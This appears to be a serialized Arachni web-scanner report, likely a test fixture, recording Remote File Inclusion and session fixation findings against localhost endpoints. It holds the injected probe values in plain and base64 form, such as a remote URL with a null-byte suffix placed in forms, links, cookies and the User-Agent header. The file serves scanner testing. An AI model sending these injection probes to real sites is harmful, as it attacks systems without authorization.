remedy_code: '' metasploitable: unix/webapp/arachni_php_include mod_name: Remote File Inclusion variations: - !ruby/object:Arachni::Issue verification: false references: WASC: http://projects.webappsec.org/Remote-File-Inclusion Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion opts: :redundant: false :async: true :regexp: 705cd559b16e6946826207c2199bd890 :match: 705cd559b16e6946826207c2199bd890 :substring: 705cd559b16e6946826207c2199bd890 :ignore: :elements: - link - form - cookie - header - body :train: :follow_location: false :injected_orig: arachni.github.com/arachni/rfi.md5.txt :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdGFyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5pL3JmaS5tZDUudHh0 AA== :injected: !binary |- ZGVmYXVsdGFyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5pL3JmaS5tZDUudHh0 AA== :combo: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdGFyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5pL3JmaS5tZDUudHh0 AA== :action: http://localhost:5571/form/append :verification: false :id: 705cd559b16e6946826207c2199bd890 var: input url: http://localhost:5571/form/append injected: !binary |- ZGVmYXVsdGFyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5pL3JmaS5tZDUudHh0 AA== id: 705cd559b16e6946826207c2199bd890 regexp: 705cd559b16e6946826207c2199bd890 regexp_match: 705cd559b16e6946826207c2199bd890 elem: form remarks: {} method: GET response: ! 
'705cd559b16e6946826207c2199bd890 ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNjowNyBHTVQ= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MzM= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Remote File Inclusion description: ! "The web application can be forced to include\n 3rd party remote content which can often lead to arbitrary code\n execution, amongst other attacks." tags: - remote - file - inclusion - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "Enforce strict validation and filtering\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_php_include mod_name: Remote File Inclusion variations: [] internal_modname: RFI internal_modname: RFI - !ruby/object:Arachni::Issue verification: false references: WASC: http://projects.webappsec.org/Remote-File-Inclusion Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion var: input url: http://localhost:5571/link/straight?input=default elem: link method: GET name: Remote File Inclusion description: ! "The web application can be forced to include\n 3rd party remote content which can often lead to arbitrary code\n execution, amongst other attacks." tags: - remote - file - inclusion - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! 
"Enforce strict validation and filtering\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_php_include mod_name: Remote File Inclusion variations: - !ruby/object:Arachni::Issue verification: false references: WASC: http://projects.webappsec.org/Remote-File-Inclusion Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion opts: :redundant: false :async: true :regexp: 705cd559b16e6946826207c2199bd890 :match: 705cd559b16e6946826207c2199bd890 :substring: 705cd559b16e6946826207c2199bd890 :ignore: :elements: - link - form - cookie - header - body :train: :follow_location: false :injected_orig: arachni.github.com/arachni/rfi.md5.txt :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": arachni.github.com/arachni/rfi.md5.txt :injected: arachni.github.com/arachni/rfi.md5.txt :combo: !binary "aW5wdXQ=": arachni.github.com/arachni/rfi.md5.txt :action: http://localhost:5571/link/straight?input=default :verification: false :id: 705cd559b16e6946826207c2199bd890 var: input url: http://localhost:5571/link/straight?input=default injected: arachni.github.com/arachni/rfi.md5.txt id: 705cd559b16e6946826207c2199bd890 regexp: 705cd559b16e6946826207c2199bd890 regexp_match: 705cd559b16e6946826207c2199bd890 elem: link remarks: {} method: GET response: ! 
'705cd559b16e6946826207c2199bd890 ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNjoxNiBHTVQ= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MzM= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Remote File Inclusion description: ! "The web application can be forced to include\n 3rd party remote content which can often lead to arbitrary code\n execution, amongst other attacks." tags: - remote - file - inclusion - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "Enforce strict validation and filtering\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_php_include mod_name: Remote File Inclusion variations: [] internal_modname: RFI internal_modname: RFI - !ruby/object:Arachni::Issue verification: false references: WASC: http://projects.webappsec.org/Remote-File-Inclusion Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion var: input url: http://localhost:5571/link/append?input=default elem: link method: GET name: Remote File Inclusion description: ! "The web application can be forced to include\n 3rd party remote content which can often lead to arbitrary code\n execution, amongst other attacks." tags: - remote - file - inclusion - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! 
"Enforce strict validation and filtering\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_php_include mod_name: Remote File Inclusion variations: - !ruby/object:Arachni::Issue verification: false references: WASC: http://projects.webappsec.org/Remote-File-Inclusion Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion opts: :redundant: false :async: true :regexp: 705cd559b16e6946826207c2199bd890 :match: 705cd559b16e6946826207c2199bd890 :substring: 705cd559b16e6946826207c2199bd890 :ignore: :elements: - link - form - cookie - header - body :train: :follow_location: false :injected_orig: hTtP://arachni.github.com/arachni/rfi.md5.txt :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdGhUdFA6Ly9hcmFjaG5pLmdpdGh1Yi5jb20vYXJhY2huaS9yZmku bWQ1LnR4dAA= :injected: !binary |- ZGVmYXVsdGhUdFA6Ly9hcmFjaG5pLmdpdGh1Yi5jb20vYXJhY2huaS9yZmku bWQ1LnR4dAA= :combo: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdGhUdFA6Ly9hcmFjaG5pLmdpdGh1Yi5jb20vYXJhY2huaS9yZmku bWQ1LnR4dAA= :action: http://localhost:5571/link/append?input=default :verification: false :id: 705cd559b16e6946826207c2199bd890 var: input url: http://localhost:5571/link/append?input=default injected: !binary |- ZGVmYXVsdGhUdFA6Ly9hcmFjaG5pLmdpdGh1Yi5jb20vYXJhY2huaS9yZmku bWQ1LnR4dAA= id: 705cd559b16e6946826207c2199bd890 regexp: 705cd559b16e6946826207c2199bd890 regexp_match: 705cd559b16e6946826207c2199bd890 elem: link remarks: {} method: GET response: ! 
'705cd559b16e6946826207c2199bd890 ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNjoxNiBHTVQ= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MzM= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Remote File Inclusion description: ! "The web application can be forced to include\n 3rd party remote content which can often lead to arbitrary code\n execution, amongst other attacks." tags: - remote - file - inclusion - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "Enforce strict validation and filtering\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_php_include mod_name: Remote File Inclusion variations: [] internal_modname: RFI internal_modname: RFI - !ruby/object:Arachni::Issue verification: false references: WASC: http://projects.webappsec.org/Remote-File-Inclusion Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion var: cookie2 url: http://localhost:5571/cookie/append elem: cookie method: GET name: Remote File Inclusion description: ! "The web application can be forced to include\n 3rd party remote content which can often lead to arbitrary code\n execution, amongst other attacks." tags: - remote - file - inclusion - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "Enforce strict validation and filtering\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_php_include mod_name: Remote File Inclusion variations: - !ruby/object:Arachni::Issue verification: false references: WASC: http://projects.webappsec.org/Remote-File-Inclusion Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion opts: :redundant: false :async: true :regexp: 705cd559b16e6946826207c2199bd890 :match: 705cd559b16e6946826207c2199bd890 :substring: 705cd559b16e6946826207c2199bd890 :ignore: :elements: - link - form - cookie - header - body :train: :follow_location: false :injected_orig: hTtP://arachni.github.com/arachni/rfi.md5.txt :altered: !binary |- Y29va2llMg== :element: cookie :params: {} :cookies: !binary "Y29va2llMg==": !binary |- Y29va2llIHZhbHVlaFR0UDovL2FyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5p L3JmaS5tZDUudHh0AA== :injected: !binary |- Y29va2llIHZhbHVlaFR0UDovL2FyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5p L3JmaS5tZDUudHh0AA== :combo: !binary "Y29va2llMg==": !binary |- Y29va2llIHZhbHVlaFR0UDovL2FyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5p L3JmaS5tZDUudHh0AA== :action: http://localhost:5571/cookie/append :verification: false :id: 705cd559b16e6946826207c2199bd890 var: cookie2 url: http://localhost:5571/cookie/append injected: !binary |- Y29va2llIHZhbHVlaFR0UDovL2FyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5p L3JmaS5tZDUudHh0AA== id: 705cd559b16e6946826207c2199bd890 regexp: 705cd559b16e6946826207c2199bd890 regexp_match: 705cd559b16e6946826207c2199bd890 elem: cookie remarks: :stuff: - Blah - Blah2 method: GET response: ! 
'705cd559b16e6946826207c2199bd890 ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+valuehTtP://arachni.github.com/arachni/rfi.md5.txt%00;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNjozMyBHTVQ= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MzM= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Remote File Inclusion description: ! "The web application can be forced to include\n 3rd party remote content which can often lead to arbitrary code\n execution, amongst other attacks." tags: - remote - file - inclusion - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "Enforce strict validation and filtering\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_php_include mod_name: Remote File Inclusion variations: [] internal_modname: RFI internal_modname: RFI - !ruby/object:Arachni::Issue verification: false references: WASC: http://projects.webappsec.org/Remote-File-Inclusion Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion var: cookie url: http://localhost:5571/cookie/straight elem: cookie method: GET name: Remote File Inclusion description: ! "The web application can be forced to include\n 3rd party remote content which can often lead to arbitrary code\n execution, amongst other attacks." tags: - remote - file - inclusion - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! 
"Enforce strict validation and filtering\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_php_include mod_name: Remote File Inclusion variations: - !ruby/object:Arachni::Issue verification: false references: WASC: http://projects.webappsec.org/Remote-File-Inclusion Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion opts: :redundant: false :async: true :regexp: 705cd559b16e6946826207c2199bd890 :match: 705cd559b16e6946826207c2199bd890 :substring: 705cd559b16e6946826207c2199bd890 :ignore: :elements: - link - form - cookie - header - body :train: :follow_location: false :injected_orig: arachni.github.com/arachni/rfi.md5.txt :altered: !binary |- Y29va2ll :element: cookie :params: {} :cookies: !binary "Y29va2ll": !binary |- YXJhY2huaS5naXRodWIuY29tL2FyYWNobmkvcmZpLm1kNS50eHQA :injected: !binary |- YXJhY2huaS5naXRodWIuY29tL2FyYWNobmkvcmZpLm1kNS50eHQA :combo: !binary "Y29va2ll": !binary |- YXJhY2huaS5naXRodWIuY29tL2FyYWNobmkvcmZpLm1kNS50eHQA :action: http://localhost:5571/cookie/straight :verification: false :id: 705cd559b16e6946826207c2199bd890 var: cookie url: http://localhost:5571/cookie/straight injected: !binary |- YXJhY2huaS5naXRodWIuY29tL2FyYWNobmkvcmZpLm1kNS50eHQA id: 705cd559b16e6946826207c2199bd890 regexp: 705cd559b16e6946826207c2199bd890 regexp_match: 705cd559b16e6946826207c2199bd890 elem: cookie remarks: {} method: GET response: ! 
'705cd559b16e6946826207c2199bd890 ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=arachni.github.com/arachni/rfi.md5.txt%00 response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNjo0MSBHTVQ= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MzM= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Remote File Inclusion description: ! "The web application can be forced to include\n 3rd party remote content which can often lead to arbitrary code\n execution, amongst other attacks." tags: - remote - file - inclusion - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "Enforce strict validation and filtering\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_php_include mod_name: Remote File Inclusion variations: [] internal_modname: RFI internal_modname: RFI - !ruby/object:Arachni::Issue verification: false references: WASC: http://projects.webappsec.org/Remote-File-Inclusion Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion var: User-Agent url: http://localhost:5571/header/append elem: header method: GET name: Remote File Inclusion description: ! "The web application can be forced to include\n 3rd party remote content which can often lead to arbitrary code\n execution, amongst other attacks." tags: - remote - file - inclusion - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! 
"Enforce strict validation and filtering\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_php_include mod_name: Remote File Inclusion variations: - !ruby/object:Arachni::Issue verification: false references: WASC: http://projects.webappsec.org/Remote-File-Inclusion Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion opts: :redundant: false :async: true :regexp: 705cd559b16e6946826207c2199bd890 :match: 705cd559b16e6946826207c2199bd890 :substring: 705cd559b16e6946826207c2199bd890 :ignore: :elements: - link - form - cookie - header - body :train: :follow_location: false :injected_orig: arachni.github.com/arachni/rfi.md5.txt :altered: User-Agent :element: header :params: :headers: User-Agent: arachni_userarachni.github.com/arachni/rfi.md5.txt :injected: arachni_userarachni.github.com/arachni/rfi.md5.txt :combo: User-Agent: arachni_userarachni.github.com/arachni/rfi.md5.txt :action: http://localhost:5571/header/append :verification: false :id: 705cd559b16e6946826207c2199bd890 var: User-Agent url: http://localhost:5571/header/append injected: arachni_userarachni.github.com/arachni/rfi.md5.txt id: 705cd559b16e6946826207c2199bd890 regexp: 705cd559b16e6946826207c2199bd890 regexp_match: 705cd559b16e6946826207c2199bd890 elem: header remarks: {} method: GET response: ! 
'705cd559b16e6946826207c2199bd890 ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: arachni_userarachni.github.com/arachni/rfi.md5.txt Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNzowMCBHTVQ= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MzM= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Remote File Inclusion description: ! "The web application can be forced to include\n 3rd party remote content which can often lead to arbitrary code\n execution, amongst other attacks." tags: - remote - file - inclusion - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "Enforce strict validation and filtering\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_php_include mod_name: Remote File Inclusion variations: [] internal_modname: RFI internal_modname: RFI - !ruby/object:Arachni::Issue verification: true references: WASC: http://projects.webappsec.org/Remote-File-Inclusion Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion var: User-Agent url: http://localhost:5571/header/straight elem: header method: GET name: Remote File Inclusion description: ! "The web application can be forced to include\n 3rd party remote content which can often lead to arbitrary code\n execution, amongst other attacks." tags: - remote - file - inclusion - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! 
"Enforce strict validation and filtering\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_php_include mod_name: Remote File Inclusion variations: - !ruby/object:Arachni::Issue verification: true references: WASC: http://projects.webappsec.org/Remote-File-Inclusion Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion opts: :redundant: false :async: true :regexp: 705cd559b16e6946826207c2199bd890 :match: 705cd559b16e6946826207c2199bd890 :substring: 705cd559b16e6946826207c2199bd890 :ignore: :elements: - link - form - cookie - header - body :train: :follow_location: false :injected_orig: hTtP://arachni.github.com/arachni/rfi.md5.txt :altered: User-Agent :element: header :params: :headers: User-Agent: hTtP://arachni.github.com/arachni/rfi.md5.txt :injected: hTtP://arachni.github.com/arachni/rfi.md5.txt :combo: User-Agent: hTtP://arachni.github.com/arachni/rfi.md5.txt :action: http://localhost:5571/header/straight :verification: false :id: 705cd559b16e6946826207c2199bd890 var: User-Agent url: http://localhost:5571/header/straight injected: hTtP://arachni.github.com/arachni/rfi.md5.txt id: 705cd559b16e6946826207c2199bd890 regexp: 705cd559b16e6946826207c2199bd890 regexp_match: 705cd559b16e6946826207c2199bd890 elem: header remarks: {} method: GET response: ! 
'705cd559b16e6946826207c2199bd890 ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: hTtP://arachni.github.com/arachni/rfi.md5.txt Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNzoxMSBHTVQ= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MzM= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Remote File Inclusion description: ! "The web application can be forced to include\n 3rd party remote content which can often lead to arbitrary code\n execution, amongst other attacks." tags: - remote - file - inclusion - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "Enforce strict validation and filtering\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_php_include mod_name: Remote File Inclusion variations: [] internal_modname: RFI internal_modname: RFI - !ruby/object:Arachni::Issue verification: false references: OWASP - Session fixation: hhttps://www.owasp.org/index.php/Session_fixation var: input url: http://localhost:12180/form/straight elem: form method: GET name: Session fixation description: The web application allows the session ID to be fixed by a 3rd party. 
tags: - session - cookie - injection - fixation - hijacking cwe: '384' cwe_url: http://cwe.mitre.org/data/definitions/384.html severity: High mod_name: Session fixation variations: - !ruby/object:Arachni::Issue verification: false references: OWASP - Session fixation: hhttps://www.owasp.org/index.php/Session_fixation opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :injected_orig: _arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": !binary |- X2FyYWNobmlfc2ZfOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1 Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQA= :follow_location: true :injected: !binary |- X2FyYWNobmlfc2ZfOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1 Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQA= :combo: !binary "aW5wdXQ=": !binary |- X2FyYWNobmlfc2ZfOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1 Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQA= :action: http://localhost:12180/form/straight :regexp: '' var: input url: http://localhost:12180/form/straight injected: !binary |- X2FyYWNobmlfc2ZfOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1 Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQA= id: regexp: '' regexp_match: elem: form remarks: {} method: GET response: !binary |- X2FyYWNobmlfc2ZfOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1 Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQA= headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: blah=blah1;blah2=blah2;session=blah response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nzc= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== 
!binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNzoxNyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== !binary "U2V0LUNvb2tpZQ==": !binary |- c2Vzc2lvbj1fYXJhY2huaV9zZl85NWY5ZjhmMDhmNmYzNzkyNDJkN2FkYTg2 Y2FlMTk2ODVjYTM4ZTVmM2U0MjI4ZDdiY2QyNDU3NThkNWI5YzU5JTAwOyBk b21haW49bG9jYWxob3N0OyBwYXRoPS87IEh0dHBPbmx5 name: Session fixation description: The web application allows the session ID to be fixed by a 3rd party. tags: - session - cookie - injection - fixation - hijacking cwe: '384' cwe_url: http://cwe.mitre.org/data/definitions/384.html severity: High mod_name: Session fixation variations: [] internal_modname: SessionFixation internal_modname: SessionFixation - !ruby/object:Arachni::Issue verification: true references: OWASP - Session fixation: hhttps://www.owasp.org/index.php/Session_fixation var: input url: http://localhost:12180/form/append elem: form method: GET name: Session fixation description: The web application allows the session ID to be fixed by a 3rd party. 
tags: - session - cookie - injection - fixation - hijacking cwe: '384' cwe_url: http://cwe.mitre.org/data/definitions/384.html severity: High mod_name: Session fixation variations: - !ruby/object:Arachni::Issue verification: true references: OWASP - Session fixation: hhttps://www.owasp.org/index.php/Session_fixation opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :injected_orig: _arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": default_arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 :follow_location: true :injected: default_arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 :combo: !binary "aW5wdXQ=": default_arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 :action: http://localhost:12180/form/append :regexp: '' var: input url: http://localhost:12180/form/append injected: default_arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 id: regexp: '' regexp_match: elem: form remarks: {} method: GET response: _arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: blah=blah1;blah2=blah2;session=blah response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NzY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNzoxNyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== !binary "U2V0LUNvb2tpZQ==": !binary |- 
